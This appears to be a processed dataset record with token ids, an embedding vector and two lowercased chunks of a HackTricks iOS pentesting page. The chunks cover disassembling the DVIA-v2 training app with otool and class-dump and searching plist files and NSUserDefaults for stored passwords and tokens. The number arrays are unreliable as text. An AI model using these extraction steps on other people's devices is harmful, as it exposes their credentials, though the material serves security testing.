10569, 1997, 1996, 12441, 2007, 1996, 6994, 27178, 13669, 1024, 27178, 13669, 1011, 1058, 2232, 1040, 9035, 1011, 1058, 2475, 1001, 4638, 2070, 6268, 12332, 3894, 17368, 13874, 17368, 6342, 19279, 18863, 9700, 5371, 13874, 13316, 26876, 2015, 2946, 11253, 27487, 5104, 9245, 2213, 2232, 1035, 3894, 1035, 4185, 2849, 21084, 2035, 1014, 2595, 8889, 15389, 3515, 6390, 12521, 15156, 3207, 10343, 1040, 8516, 19422, 19839, 2048, 20414, 2884, 5410, 1035, 11859, 20817, 1035, 2000, 1035, 5410, 11345, 11439, 4747, 1011, 1048, 1040, 9035, 1011, 1058, 2475, 1001, 2131, 2353, 2283, 8860, 2094, 9035, 1011, 1058, 2475, 1024, 1013, 2149, 2099, 1013, 5622, 2497, 1013, 5622, 9818, 1009, 1009, 1012, 1015, 1012, 1040, 8516, 12322, 1006, 21778, 2544, 1015, 1012, 1014, 1012, 1014, 1010, 2783, 2544, 4278, 1012, 1023, 1012, 1015, 1007, 1013, 2149, 2099, 1013, 5622, 2497, 1013, 5622, 5910, 4160, 22779, 2509, 1012, 1040, 8516, 12322, 1006, 21778, 2544, 1023, 1012, 1014, 1012, 1014, 1010, 2783, 2544, 25586, 1012, 1020, 1012, 1014, 1007, 1013, 2149, 2099, 1013, 5622, 2497, 1013, 5622, 2497, 2480, 1012, 1015, 1012, 1040, 8516, 12322, 1006, 21778, 2544, 1015, 1012, 1014, 1012, 1014, 1010, 2783, 2544, 1015, 1012, 1016, 1012, 2340, 1007, 1030, 1054, 15069, 1013, 19947, 1012, 7705, 1013, 19947, 1006, 21778, 2544, 1015, 1012, 1014, 1012, 1014, 1010, 2783, 2544, 1015, 1012, 1014, 1012, 1014, 1007, 1031, 1012, 1012, 1012, 1033, 4638, 2065, 1996, 10439, 2003, 4372, 26775, 22571, 3064, 19763, 2065, 2045, 2003, 2151, 6434, 2005, 1024, 27178, 13669, 1011, 1048, 1026, 10439, 1011, 12441, 1028, 1064, 24665, 13699, 1011, 1037, 1018, 29215, 1035, 21999, 1035, 18558, 10521, 27241, 29256, 1996, 12441, 10521, 27241, 19661, 1996, 3793, 2930, 1024, 27178 ]
hack_tricks
43.txt
6
##ool - tv dvia - v2dvia - v2 : ( _ _ text, _ _ text ) section + [ ddlog initialize ] : 0000000100004ab8 sub sp, sp, # 0x600000000100004abc stp x29, x30, [ sp, # 0x50 ] ; latency : 60000000100004ac0 add x29, sp, # 0x500000000100004ac4 sub x8, x29, # 0x100000000100004ac8 mov x9, # 0x00000000100004acc adrp x10, 1098 ; 0x10044e0000000000100004ad0 add x10, x10, # 0x268to print the objective - c segment of the sample application one can use : otool - ov dvia - v2dvia - v2 : contents of ( _ _ data, _ _ objc _ classlist ) section00000001003dd5b8 0x1004423d0 _ objc _ class _ $ _ ddlog isa 0x1004423a8 _ objc _ metaclass _ $ _ ddlog superclass 0x0 _ objc _ class _ $ _ nsobject cache 0x0 _ _ objc _ empty _ cache vtable 0x0 data 0x1003de748 flags 0x80 instancestart 8in order to obtain a more compact objective - c code you can use class - dump : class - dump some - app / / / / generated by class - dump 3. 5 ( 64 bit ). / / / / class - dump is copyright ( c ) 1997 - 1998, 2000 - 2001, 2004 - 2013 by steve nygard. / / # pragma mark named structuresstruct cgpoint { double _ field1 ; double _ field2 ; } ; struct cgrect { struct cgpoint _ field1 ; struct cgsize _ field2 ; } ; struct cgsize { double _ field1 ; double _ field2 ; } ; however, the best options to disassemble the binary are : hopper and ida. use trickest to easily build and automate workflows powered by the world's most advanced community tools. data storageto learn
[ 0.4138311743736267, -0.041292641311883926, 0.14553281664848328, 1.1607023477554321, -0.5383340716362, 0.26285409927368164, -0.2816522717475891, 0.40293386578559875, 0.3161180317401886, 0.3482651114463806, 0.1368519514799118, 0.11052528768777847, 0.6209823489189148, -0.27436089515686035, -0.46272990107536316, -0.1435176432132721, -0.7319207787513733, -0.38571158051490784, -1.4287537336349487, 0.21218036115169525, -0.3546516001224518, 0.04932659864425659, -1.0271726846694946, -0.7538783550262451, 0.10744323581457138, 0.7135012149810791, 0.8150180578231812, -0.051951318979263306, 0.782263457775116, 0.23081150650978088, 0.4953586161136627, -0.42577850818634033, 0.0920005664229393, -0.46314266324043274, 0.134686678647995, -0.12889571487903595, 0.9420473575592041, -0.07532212883234024, -0.016666369512677193, -0.48781508207321167, 0.3524680435657501, -0.35714781284332275, 0.3227251172065735, -0.421703964471817, -0.37646692991256714, -0.7833148837089539, 0.6786611080169678, -0.10958515852689743, 0.3631485402584076, 0.2990884780883789, -0.023319009691476822, 0.16335442662239075, -0.6493074297904968, -0.28747281432151794, 0.006587960757315159, 0.23189489543437958, -0.04604119434952736, -0.10125797986984253, -0.5645849108695984, 0.35227376222610474, -0.2715485095977783, 0.4366791248321533, 0.1590277999639511, -1.0191630125045776, -0.14343862235546112, 0.5227062106132507, -0.015672797337174416, -0.25409260392189026, -0.7654210329055786, 0.0720290094614029, -0.32601359486579895, 0.6215202808380127, -0.5440464615821838, -0.3868318200111389, -0.5238226056098938, -0.05711425468325615, -0.42272520065307617, 0.05190231278538704, -0.04519883543252945, 0.7349083423614502, -0.22210226953029633, 0.38283678889274597, 0.6591949462890625, -0.3357894718647003, -0.3023293614387512, -0.2990454137325287, 0.2401426136493683, 0.3036806583404541, -0.17891636490821838, 0.2501121759414673, 0.12043730914592743, 0.45883435010910034, -0.7050598859786987, -0.027722805738449097, 0.16838830709457397, 0.7159693241119385, -0.3502591550350189, 0.2142019420862198, 0.9662087559700012, -0.1781742125749588, 0.7417689561843872, 0.25931695103645325, 0.30385085940361023, 1.027633547782898, -0.48641157150268555, 0.497713565826416, 0.410768985748291, -0.21785341203212738, 0.32331129908561707, -0.814625084400177, 0.613895833492279, 0.04604475945234299, 0.5348986983299255, -0.32964712381362915, -0.2915155291557312, 0.29047757387161255, -0.094614177942276, 0.2859145998954773, -1.0590723752975464, 0.3454873561859131, 0.05498683452606201, -0.2467310130596161, 0.5659035444259644, -0.26160046458244324, 0.8364048004150391, -0.2626720070838928, 0.5288915634155273, 0.6896981596946716, -0.9087100625038147, -0.4364967942237854, 0.160920187830925, -0.025721557438373566, -0.2902398705482483, 0.967492938041687, -0.1218254342675209, -0.1334933191537857, 0.17976468801498413, 0.11797131597995758, 0.6523820757865906, -0.46157729625701904, 0.03768176585435867, 0.4355362355709076, 0.0026015678886324167, 1.092974305152893, 0.24861912429332733, -0.09630429744720459, -0.24866773188114166, 0.21392539143562317, -0.4341531991958618, 0.4727540910243988, -0.08794698119163513, -0.1817241907119751, 0.5583130717277527, -0.7392228841781616, -0.7784170508384705, 0.2328183501958847, 0.04560107737779617, 0.42242711782455444, -0.6152637600898743, 0.04413467273116112, 0.7688407301902771, 0.30219125747680664, -0.2738637328147888, -0.07136604189872742, -0.6282545328140259, 0.3937760889530182, 0.026330383494496346, -0.631743311882019, -0.0577884316444397, 0.3165963590145111, 0.4234946370124817, -0.286445289850235, -0.2511642575263977, -0.1126207634806633, 1.15578293800354, 0.4777344763278961, 0.4338752031326294, -0.08563327044248581, 0.02875622734427452, 0.5618126392364502, -0.5868510603904724, 0.33935579657554626, 0.19481363892555237, 1.0214835405349731, 0.27296343445777893, 0.3470116853713989, -0.25012972950935364, -0.07685792446136475, -0.016512224450707436, 0.004236647859215736, -0.2455029934644699, 0.6465049386024475, -0.7047950625419617, 0.1759943962097168, 0.4738865792751312, 0.5408511161804199, -1.1952258348464966, 0.21693076193332672, -0.060584962368011475, -1.6909253597259521, -0.213802307844162, 0.3436020612716675, -0.6101798415184021, 0.3363855481147766, -0.5913415551185608, -0.2298743575811386, 0.4801447093486786, 0.7943782210350037, -0.11602815240621567, 0.7013523578643799, 0.6658220291137695, 0.019183918833732605, -0.5254376530647278, 0.2336418628692627, 0.3633797764778137, -0.2452448457479477, -0.20531244575977325, 0.9354631900787354, -0.04575536027550697, 0.32623058557510376, 0.15527741611003876, 0.5702676177024841, 0.5711209774017334, 0.7113907337188721, -0.038457371294498444, -0.1199764534831047, 0.08439573645591736, 0.05884148180484772, -0.5386164784431458, -0.035838622599840164, 0.6425820589065552, 0.7046459317207336, 0.5697868466377258, 1.3978394269943237, 0.4342314302921295, -0.5654155015945435, 0.3676754832267761, 0.2986904978752136, -0.18008829653263092, -0.10581392794847488, -0.06563907861709595, 0.7983401417732239, 0.24341681599617004, 0.3790002167224884, 0.2811434864997864, -0.1512150913476944, -0.3996974229812622, -0.5535312294960022, 0.48315176367759705, 0.03948860615491867, 0.31100496649742126, 0.6726999282836914, 0.40759414434432983, -0.25066885352134705, -0.6564026474952698, -0.136236310005188, 0.6121574640274048, 0.4345693588256836, -0.5547851324081421, -0.7004162073135376, 0.4077617824077606, -0.04104428365826607, -0.963107168674469, -0.3189907371997833, 0.4979473948478699, -0.10896611958742142, -0.27356094121932983, 0.25067007541656494, -0.23260675370693207, -0.6659329533576965, -0.7170171141624451, -0.5699738264083862, -1.0995179414749146, -0.810937225818634, -0.48244401812553406, 0.02848224900662899, 0.8139539957046509, -0.3098866641521454, 0.4097216725349426, -0.08520933985710144, -0.4462106227874756, 0.04065164178609848, 0.052244849503040314, 0.3061337471008301, 0.2684858739376068, 0.43378666043281555, -0.7433238625526428, 0.38071081042289734, 0.22643473744392395, 0.6044159531593323, -0.21656639873981476, -0.7836880087852478, -0.37035098671913147, 0.17391377687454224, -0.21104177832603455, -0.23401707410812378, 0.3631521463394165, -0.25685441493988037, -0.4869641661643982, -0.45544469356536865, -0.1013670340180397, -0.4084074795246124, -0.35486888885498047, 0.1934565156698227, -0.2047673910856247, 0.8234448432922363, -0.5668104290962219, -0.3496893048286438, 0.15446631610393524, 0.6413859724998474, -0.8712694644927979, 0.404493510723114, 0.03629515692591667, 0.6659374833106995, -0.5944452881813049, 0.4990287125110626, 0.48043912649154663, 0.43668225407600403, -0.2101338505744934, -0.27779874205589294, 0.22663068771362305, -0.28065207600593567, -0.03703353926539421, -0.3768209218978882, -0.3507753610610962, 0.29381507635116577, 0.12538093328475952, -0.9674016833305359, -0.176163449883461, 0.2921527624130249, 0.004190107341855764, -0.17205363512039185, -0.9166651964187622, 0.6544267535209656, 0.11019713431596756, 0.05542483553290367, -0.180249884724617, -0.8868597149848938, 0.24035285413265228, 0.1730966717004776, 0.4008030295372009, -0.7560265064239502, 0.27293533086776733, 0.3362550437450409, -0.0695454403758049, 0.9665263295173645, 0.08963235467672348, -0.08759304136037827, 0.19645896553993225, -0.06598395854234695, 0.2181338220834732, 0.017749998718500137, 0.376529723405838, 0.19136036932468414, 0.2992474138736725, 0.240754634141922, -0.3165903389453888, -0.23643288016319275, 0.6665119528770447, -0.3780236542224884, 0.3072691857814789, 0.12676650285720825, 0.04687435179948807, -0.4056748151779175, -0.5359224677085876, -0.6064913272857666, 0.26701733469963074, 0.26405662298202515, 0.206289604306221, 0.11312343925237656, 0.26910772919654846, 0.03158247098326683, -0.14373159408569336, 0.4302980899810791, -0.05164824426174164, -0.43036967515945435, 0.9670408368110657, 0.05787114426493645, 0.6492577195167542, -0.7062758803367615, -0.48314470052719116, 0.07485797256231308, 0.0025393767282366753, 0.6769017577171326, 0.4358392655849457, 0.32037782669067383, -0.646476686000824, -0.3907776176929474, -0.2872307598590851, -0.22111032903194427, 0.9280900359153748, -0.328197181224823, -0.060157038271427155, -0.7837929129600525, -0.4211379587650299, -0.5440124869346619, 0.4704393148422241, 0.8089478611946106, 0.43634679913520813, 0.5466970801353455, 0.1602935642004013, 0.1724080592393875, -0.6290731430053711, 0.7920082211494446, -0.7675390243530273, 0.1935255527496338, -0.2960262894630432, 0.27205875515937805, 0.1080395057797432, 0.0018175881123170257, -0.1945146918296814, -0.5773680210113525, -0.468391090631485, -0.0920933410525322, -0.5266982316970825, 0.29679444432258606, -0.4202277958393097, -0.15541337430477142, 0.21642278134822845, 0.29605552554130554, -0.8007693290710449, 0.12783905863761902, -0.6680476665496826, 0.7767566442489624, 0.18028633296489716, -0.8120153546333313, -0.13265499472618103, -1.0824615955352783, 0.4175952076911926, 0.37047141790390015, 0.07142788916826248, -0.1431092619895935, -0.5013668537139893, -0.1421278864145279, -0.7574895024299622, 0.689559280872345, 0.2314070165157318, 0.5441749095916748, 0.40286657214164734, -0.8362458348274231, 0.007262713275849819, 0.6617221832275391, -0.5659881830215454, -0.9568606019020081, -0.33311566710472107, 0.3282856047153473, 0.5213277339935303, 0.5915359854698181, -0.24280603229999542, -0.08210251480340958, 0.20971444249153137, -0.6770684719085693, 0.25155308842658997, -0.6416275501251221, -0.6426157355308533, 0.17759183049201965, -0.08681975305080414, -0.02696201391518116, 0.34717121720314026, -0.47952932119369507, -0.18231889605522156, -0.37619516253471375, 0.3664589524269104, 0.034819096326828, -0.05140698701143265, 1.0154956579208374, -0.23427507281303406, -0.18128462135791779, 0.22443856298923492, 0.15642106533050537, 0.1490492969751358, -0.07161477953195572, -0.5268898010253906, -0.6148999929428101, 0.9912694096565247, -0.649885356426239, 0.0715404748916626, -0.03681674599647522, 0.12399670481681824, 0.15300752222537994, -0.6914482116699219, 0.41110023856163025, 0.4649519622325897, -0.10521911084651947, -0.6493581533432007, -0.3856714963912964, -0.3293318450450897, 0.612940788269043, -0.7433873414993286, 0.18153499066829681, 0.3597913086414337, -0.2134372442960739, 0.017116647213697433, -0.42117810249328613, -0.7656638622283936, -0.8017269372940063, -0.02918955497443676, 0.07496566325426102, 0.41885337233543396, 0.26428723335266113, 0.4850647747516632, -0.06962469220161438, -0.15027715265750885, 0.14597778022289276, -0.4487372934818268, 0.2504892647266388, -0.9029145836830139, 0.06235635280609131, -0.4547404944896698, 0.328462153673172, -0.5092586278915405, 0.923017680644989, -0.12749715149402618, -0.037899333983659744, -0.2997451722621918, 0.3895833194255829, 0.38409873843193054, -0.43124476075172424, -0.3810019791126251, 0.794646143913269, -0.22647075355052948, -0.35209548473358154, -0.6511143445968628, 0.38398057222366333, 0.12190122157335281, -0.0740431547164917, 0.07823185622692108, -0.2794479429721832, -1.1766284704208374, -0.4822477698326111, 0.3915388286113739, -0.6685560345649719, 0.9432612657546997, -0.368604451417923, -0.2974991202354431, 0.5066462159156799, 0.07626529783010483, -0.08156309276819229, -1.093493938446045, -0.509033739566803, -0.3170972466468811, 0.1725873053073883, 0.07350192964076996, 0.10860889405012131, -0.17938530445098877, -0.9104818105697632, -0.27253252267837524, 0.4842986464500427, -0.05960232391953468, 0.044811759144067764, 0.36466485261917114, -0.19791918992996216, 0.06195273622870445, 0.2261093258857727, -0.1621723175048828, -0.3743976354598999, -0.2232779711484909, -0.3566032350063324, -0.3132089674472809, 0.3624719977378845, -0.8268777132034302, 0.1614609658718109, -0.48480525612831116, -0.32470470666885376, 0.644813597202301, -0.05021905526518822, 0.10957840830087662, -0.736941397190094, 0.501480221748352, -0.6824516654014587, -0.003092479659244418, -0.24528568983078003, 0.08521538972854614, 0.4597398340702057, -0.1454451084136963, -0.550918698310852, -0.3337835967540741, -0.3818393349647522, -1.5590077638626099, 0.300845205783844, 0.40669310092926025, -0.080048568546772, -0.054813649505376816, 0.1578977108001709, 0.3987666666507721, 0.008747267536818981, 0.615725576877594, 0.8519130945205688, 0.3610302805900574, 0.220914825797081, -0.8128170371055603, 0.43579068779945374, 0.03992212936282158, 0.5030304193496704, -0.2181861251592636, -0.060106731951236725, -0.09672808647155762, 0.6144261956214905, -0.7487791180610657, 0.18958136439323425, -0.6037802696228027, -0.20187495648860931, 0.522582471370697, 0.1516892910003662, 0.40802061557769775, -0.33052191138267517, -1.0361536741256714, 0.09702211618423462, 0.5031694769859314, -0.17053957283496857, -0.5598396062850952, 0.007688441313803196, 0.5376447439193726, -0.20787446200847626, -0.12939472496509552, 0.36417528986930847, -0.7012991309165955, 0.39787688851356506, 1.0327885150909424, -0.5287968516349792, -0.6725193858146667, 1.1014821529388428, 0.5277804136276245, -0.8416544795036316, -0.5924002528190613, -0.19339102506637573, -0.08307651430368423, -0.03139928728342056, -0.25878122448921204, -0.4323214292526245, 0.21403253078460693, 0.2741219997406006, 0.03096047230064869, 0.2192218005657196, 0.30372413992881775, 0.015316588804125786, -0.4307709336280823, 0.6016866564750671, 0.06990385055541992, 0.2709956467151642, 0.5238903164863586, -0.8151585459709167, -0.5119041800498962, -0.9649969935417175, -0.010638866573572159, -0.05331922695040703, 0.18971113860607147, 0.5935990810394287, -0.5331894159317017, 0.418842077255249, -0.3515305519104004, -0.4020305871963501, 0.47203943133354187, -0.1784026026725769, 0.12483841925859451, 1.0344728231430054, 0.2165965735912323, -0.9742318987846375, -0.14924804866313934, -0.06778813898563385, 0.34764575958251953, 0.3529498279094696, -0.48957520723342896, -0.11104554682970047, -0.02225658856332302, -0.23541101813316345, -0.3439670205116272, -0.6882761716842651, -1.4058665037155151, -0.7792140245437622, -0.5186076760292053, -0.04656088724732399, -0.20227323472499847, 0.05788758397102356, 0.9682993292808533, -0.4271867573261261, -0.34214019775390625, -0.12749643623828888, 0.43603453040122986, 0.20287790894508362, -0.08923102170228958, -0.2906719148159027, -0.24348711967468262, -0.7018584609031677, -0.38213515281677246, -0.1842547506093979, -0.325878769159317, -0.4100451171398163, -0.6293789744377136, -0.6613364815711975, 0.18604953587055206, -0.11094232648611069, 0.8345589637756348, -0.4015253186225891, 0.2514321208000183, 0.07015092670917511, -0.4675663709640503, 0.5178709626197815, 0.4441993832588196, -0.3557785749435425, 0.4318564832210541, -0.09446027129888535, 0.2157042920589447, 0.3363487422466278, -0.28712037205696106, 0.2699120342731476, 0.35737475752830505, 0.07522334158420563, -0.21399182081222534, 0.13101819157600403, -0.6243647933006287, 0.20765627920627594, -0.030380308628082275, -0.6007905006408691, -0.3113102912902832, -0.278703510761261, 0.2893840968608856, 0.051779236644506454, -0.5757153630256653, -0.14902248978614807, 0.9562131762504578, 0.19482094049453735, 0.13513897359371185, -1.029255747795105, 0.46651023626327515, 0.6877926588058472, 0.0740896612405777, -0.05820881202816963, -0.22167973220348358, 0.6185404658317566, -0.741597592830658, 0.3164673447608948, 0.25734448432922363, -0.5557839274406433, 0.7157074809074402, 0.380127489566803, 0.00582129368558526, -0.30113860964775085, -0.13322746753692627, 0.46712952852249146, 0.4397336542606354, 0.32934805750846863, 0.027229221537709236, 0.3564588725566864, 0.035071566700935364, -0.33089643716812134, -0.3278105556964874, -0.7719767689704895, -0.14962266385555267, -0.2130584865808487, -1.0667704343795776, 0.4062740206718445, 0.1866612732410431, -0.6336065530776978, 0.20017404854297638, -0.13270002603530884, 0.3159492611885071, 0.6700714826583862, 0.41165831685066223, 0.04995647445321083, 0.8026897311210632, -1.1373240947723389, -0.836581826210022, -0.00476887496188283, 0.02515552192926407, -0.7491359114646912, -0.8768612742424011, -0.17539067566394806, 0.6805623769760132, 0.36439916491508484, -0.12437218427658081, -0.47295355796813965, 0.716387152671814, 0.24603049457073212, 0.11423894017934799, -0.27754488587379456, 0.45015543699264526, -0.5344230532646179, 0.24264740943908691, -0.47845640778541565, 0.0049387733452022076, 0.469958633184433, -0.1958693116903305, 0.13043776154518127, 0.3464461863040924, -1.0410058498382568, 0.44165217876434326, 0.35965803265571594, 0.3587057888507843, 0.5948812961578369, 0.515186607837677, 0.4230634868144989, -0.25604739785194397, 0.3237473964691162, -0.3026110529899597, 0.27984440326690674, 0.14555317163467407, 0.4445652365684509, 0.27262941002845764, 0.3041805624961853, 0.6758977174758911, -0.29524439573287964, -0.07400280237197876, 0.7038782238960266, 0.15513652563095093, -0.7229554057121277, -0.0901031494140625, -0.5087105631828308, -0.07824878394603729, -0.0006469210493378341, 0.5381377935409546, 0.07000613957643509, 0.17551200091838837, -0.03748875483870506, 0.6563237309455872, 0.09221474081277847, 0.19259512424468994, -1.1716070175170898, 0.00017373653827235103, -0.7060691118240356, -0.16043689846992493, 0.3234262764453888, 0.1632724106311798, -0.6307833790779114, 0.35739606618881226, 0.05107038840651512, 0.2855274975299835, 0.010434276424348354, 0.6944997310638428, -0.7444268465042114, 0.3750602900981903, 0.08347418904304504, -0.006933742202818394, -0.6204917430877686, -0.033534809947013855, 0.07844392210245132, -0.4284365773200989, -0.6221837997436523, 0.7292361259460449, 0.5000746846199036, -0.380051851272583, 0.921541154384613, 0.10977563261985779, 0.2077343910932541, -0.6499706506729126, -0.2763507664203644, -0.18915420770645142, 0.48385703563690186, 0.4278009235858917, -0.10734962671995163, -0.9369398951530457, 0.6826357245445251, 0.4645775854587555, 0.5153124332427979, 0.5123754739761353, 0.8164325952529907, -0.4949027895927429, 1.0280711650848389, -0.23928387463092804, -0.0732005164027214, 0.11353923380374908, -0.033307917416095734, -0.6262086629867554, -0.3606555759906769, 0.05353529751300812, 0.14591585099697113, 0.1369149386882782, 0.3018386662006378, -0.6055158972740173, -0.3445592224597931, -0.1403983235359192, -0.503108561038971, -0.06633442640304565, 0.6253497004508972, 0.011367596685886383, -0.3940465748310089, -0.16321943700313568, -0.2850947380065918, 0.3975856602191925, 0.24983929097652435, -0.19734147191047668, -0.5402567982673645, -0.5265511274337769, -0.3788132667541504, 0.2158290594816208, 1.1785486936569214, 0.08014078438282013, -0.1711072474718094, -0.36887091398239136, -0.78538978099823, -0.14034514129161835, 0.565976083278656, -0.18405652046203613, -0.593892514705658, 0.3497169017791748, 0.554694652557373, 0.8247845768928528, 0.4714222848415375, 0.09613928198814392, -0.7869476079940796, 0.21200315654277802, 0.8217185139656067, -0.31173527240753174, 0.9606525301933289, 0.7303920984268188, -0.20649181306362152, 0.047621071338653564, -0.04431535303592682, 0.3057602047920227, -0.22739765048027039, 0.2685279846191406, -0.12445297092199326, -0.049879249185323715, -0.6033741235733032, -0.22138366103172302, -0.10432659834623337, -0.0902998298406601, -0.04748476296663284, -0.41485071182250977, -1.1378917694091797, -0.048387106508016586, -0.3946375846862793, 0.05988027900457382, -0.18813979625701904, -0.3984273672103882, 0.5245977640151978, -0.003534932853654027, 0.5681934356689453, -1.3796790838241577, 4.487807750701904, 0.2154213786125183, -0.06667361408472061, 0.3660168945789337, 0.00013025851512793452, 0.29026177525520325, 1.2288272380828857, -0.7993925213813782, 0.1958017349243164, -0.32296323776245117, -0.2231520265340805, 0.35925182700157166, 0.4712017774581909, 0.4122835695743561, 0.6554557681083679, 0.33047258853912354, -0.7519567608833313, -0.14207440614700317, 0.2256329506635666, -0.5638380646705627, -1.2127028703689575, 0.04387196525931358, -0.018371790647506714, 0.5456743836402893, 0.4696826636791229, 0.19618669152259827, 0.7072595953941345, -0.8167260885238647, 0.008057288825511932, -0.1663455069065094, 0.1104390025138855, -0.099568672478199, 0.26642173528671265, -0.09245629608631134, -0.6131914258003235, -0.2809400260448456, 0.39547064900398254, -1.2063158750534058, -0.2098546028137207, 0.2502937912940979, -0.055314745754003525, 0.4087584316730499, 0.27941352128982544, -0.4076727032661438, 0.04414108395576477, 0.3394230306148529, -0.7542845010757446, 0.32335662841796875, 0.4917381703853607, -1.0433151721954346, 0.8007721304893494, -0.3499617576599121, 0.6213377714157104, 0.3132840394973755, -0.7076963782310486, 0.10939417779445648, 0.03352943807840347, -0.5030657052993774, 0.5384848117828369, -0.45088911056518555, 0.5687811374664307, -0.5502188205718994, -0.014405498281121254, -0.014778168871998787, -0.38900554180145264, -0.05607735738158226, -0.2370450347661972, -0.023870481178164482, 0.043688226491212845, -0.07674295455217361, 0.14834736287593842, 0.18288634717464447, -0.760347843170166, 0.20740635693073273, 1.4042277336120605, -0.14606375992298126, -0.12987293303012848, 0.28027403354644775, -0.041830841451883316, -0.2884719967842102, 0.20902413129806519, -0.9260029196739197, -0.21159641444683075, -0.48543092608451843, 0.5795527100563049, 0.6265564560890198, 0.2571444809436798, -0.5739440321922302, -0.353368878364563, 0.11964957416057587, 0.2915080189704895, 0.39125916361808777, -0.37690469622612, 0.021323375403881073, -0.05920130014419556 ]
[ 13669, 1011, 2694, 1040, 9035, 1011, 1058, 2475, 2094, 9035, 1011, 1058, 2475, 1024, 1006, 1035, 1035, 3793, 1010, 1035, 1035, 3793, 1007, 2930, 1009, 1031, 20315, 21197, 3988, 4697, 1033, 1024, 2199, 8889, 8889, 18613, 8889, 2549, 7875, 2620, 4942, 11867, 1010, 11867, 1010, 1001, 1014, 2595, 16086, 8889, 8889, 8889, 24096, 8889, 8889, 2549, 7875, 2278, 2358, 2361, 1060, 24594, 1010, 1060, 14142, 1010, 1031, 11867, 1010, 1001, 1014, 2595, 12376, 1033, 1025, 2397, 9407, 1024, 25961, 8889, 8889, 18613, 8889, 2549, 6305, 2692, 5587, 1060, 24594, 1010, 11867, 1010, 1001, 1014, 2595, 29345, 8889, 8889, 8889, 18613, 8889, 2549, 6305, 2549, 4942, 1060, 2620, 1010, 1060, 24594, 1010, 1001, 1014, 2595, 18613, 8889, 8889, 8889, 18613, 8889, 2549, 6305, 2620, 9587, 2615, 1060, 2683, 1010, 1001, 1014, 2595, 8889, 8889, 8889, 8889, 18613, 8889, 2549, 6305, 2278, 4748, 14536, 1060, 10790, 1010, 11518, 2620, 1025, 1014, 2595, 18613, 22932, 2063, 8889, 8889, 8889, 8889, 8889, 18613, 8889, 2549, 4215, 2692, 5587, 1060, 10790, 1010, 1060, 10790, 1010, 1001, 1014, 2595, 23833, 2620, 3406, 6140, 1996, 7863, 1011, 1039, 6903, 1997, 1996, 7099, 4646, 2028, 2064, 2224, 1024, 27178, 13669, 1011, 1051, 2615, 1040, 9035, 1011, 1058, 2475, 2094, 9035, 1011, 1058, 2475, 1024, 8417, 1997, 1006, 1035, 1035, 2951, 1010, 1035, 1035, 27885, 3501, 2278, 1035, 2465, 9863, 1007, 2930, 8889, 8889, 8889, 24096, 8889, 29097, 2094, 2629, 2497, 2620, 1014, 2595, 18613, 22932, 21926, 2094, 2692, 1035, 27885, 3501, 2278, 1035, 2465, 1035, 1002, 1035, 20315, 21197, 18061, 1014, 2595, 18613, 22932, 21926, 2050, 2620, 1035, 27885, 3501, 2278, 1035, 18804, 26266, 1035, 1002, 1035, 20315, 21197, 3565, 26266, 1014, 2595, 2692, 1035, 27885, 3501, 2278, 1035, 2465, 1035, 1002, 1035, 24978, 16429, 20614, 17053, 1014, 2595, 2692, 1035, 1035, 27885, 3501, 2278, 1035, 4064, 1035, 17053, 28879, 3085, 1014, 2595, 2692, 2951, 1014, 2595, 18613, 29097, 2063, 2581, 18139, 9245, 1014, 2595, 17914, 12107, 7559, 2102, 1022, 2378, 2344, 2000, 6855, 1037, 2062, 9233, 7863, 1011, 1039, 3642, 2017, 2064, 2224, 2465, 1011, 15653, 1024, 2465, 1011, 15653, 2070, 1011, 10439, 1013, 1013, 1013, 1013, 7013, 2011, 2465, 1011, 15653, 1017, 1012, 1019, 1006, 4185, 2978, 1007, 1012, 1013, 1013, 1013, 1013, 2465, 1011, 15653, 2003, 9385, 1006, 1039, 1007, 2722, 1011, 2687, 1010, 2456, 1011, 2541, 1010, 2432, 1011, 2286, 2011, 3889, 6396, 13444, 1012, 1013, 1013, 1001, 10975, 8490, 2863, 2928, 2315, 5090, 3367, 6820, 6593, 1039, 21600, 25785, 1063, 3313, 1035, 2492, 2487, 1025, 3313, 1035, 2492, 2475, 1025, 1065, 1025, 2358, 6820, 6593, 1039, 17603, 6593, 1063, 2358, 6820, 6593, 1039, 21600, 25785, 1035, 2492, 2487, 1025, 2358, 6820, 6593, 1039, 5620, 4697, 1035, 2492, 2475, 1025, 1065, 1025, 2358, 6820, 6593, 1039, 5620, 4697, 1063, 3313, 1035, 2492, 2487, 1025, 3313, 1035, 2492, 2475, 1025, 1065, 1025, 2174, 1010, 1996, 2190, 7047, 2000, 4487, 20939, 3366, 19661, 1996, 12441, 2024, 1024, 20517, 1998, 16096, 1012, 2224, 7577, 4355, 2000, 4089, 3857, 1998, 8285, 8585, 2147, 12314, 2015, 6113, 2011, 1996, 2088, 1005, 1055, 2087, 3935, 2451, 5906, 1012, 2951, 5527, 3406, 4553 ]
hack_tricks
43.txt
7
about how ios stores data in the device read this page : ios basicsthe following places to store information should be checked right after installing the application, after checking all the functionalities of the application and even after login out from one user and login into a different one. the goal is to find unprotected sensitive information of the application ( passwords, tokens ), of the current user and of previously logged users. plistplist files are structured xml files that contains key - value pairs. it's a way to store persistent data, so sometimes you may find sensitive information in these files. it's recommended to check these files after installing the app and after using intensively it to see if new data is written. the most common way to persist data in plist files is through the usage of nsuserdefaults. this plist file is saved inside the app sandbox in library / preferences / < appbundleid >. plistthe nsuserdefaults class provides a programmatic interface for interacting with the default system. the default system allows an application to customize its behaviour according to user preferences. data saved by nsuserdefaults can be viewed in the application bundle. this class stores data in a plist file, but it's meant to be used with small amounts of data. this data cannot be longer accessed directly via a trusted computer, but can be accessed performing a backup. you can dump the information saved using nsuserdefaults using objection's ios nsuserdefaults getto find all the plist of used by the application you can access to / private / var / mobile / containers / data / application / { appid } and run : find. / - name " *. plist " the file might be formatted in xml or binary ( bplist ). you can convert it to xml format with one simple command : on macos with plutil, which is a tool that comes natively with macos 10. 2 and above versions ( no official online documentation is currently available ) : $ plutil - convert xml1 info. pliston linux : $ apt install libplist - utils $ plistutil - i info. plist - o info _ xml. pliston an objection's session : ios plist cat / private / var / mobile / containers / data / application / af1f534b - 1b8f - 0825 - acb
